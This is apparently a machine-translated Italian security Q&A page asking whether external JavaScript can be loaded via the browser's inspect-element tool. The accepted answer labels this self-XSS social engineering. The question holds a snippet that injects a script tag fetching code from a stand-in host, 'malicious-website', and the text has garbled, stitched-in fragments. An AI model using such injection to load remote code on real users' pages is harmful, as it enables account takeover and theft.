È possibile caricare script JS esterni tramite la funzione "controlla elementi"?

Question

È possibile caricare script JS esterni tramite la funzione "controlla elementi"?

#1 da (3 voti)

1

Apri Ispeziona elemento

Fai clic con il pulsante destro del mouse sul tag del corpo o, in ogni caso, su Modifica come HTML in questo modo:

<button onclick="loadScript();">;Click to load external script.</button>
<script>
function loadScript() {
    var script = document.createElement('script');

    script.setAttribute('type', 'text/javascript');
    script.setAttribute('src', 'http://malicious-website/malicious-script.js');
    document.head.appendChild(script);
}
</script>

Quindi, questo tipo di attacco è possibile?

web firefox xss

posta mzcoxfde 02.10.2016 - 13:05

fonte

1 risposta

Leggi altre domande sui tag web firefox xss

Spytechphone - iPhone MD5 è adatto per il single sign on?

score 3 · Accepted Answer

Lo classificherei come "ingegneria sociale"; qualcuno dice a terzi di farlo con i loro devtools. E sì, è un possibile vettore di attacco.

Spesso viene avvertito quando apri gli strumenti F12 su say facebook ad es.

da(tedesco)facebook.

Lochiamano Self XSS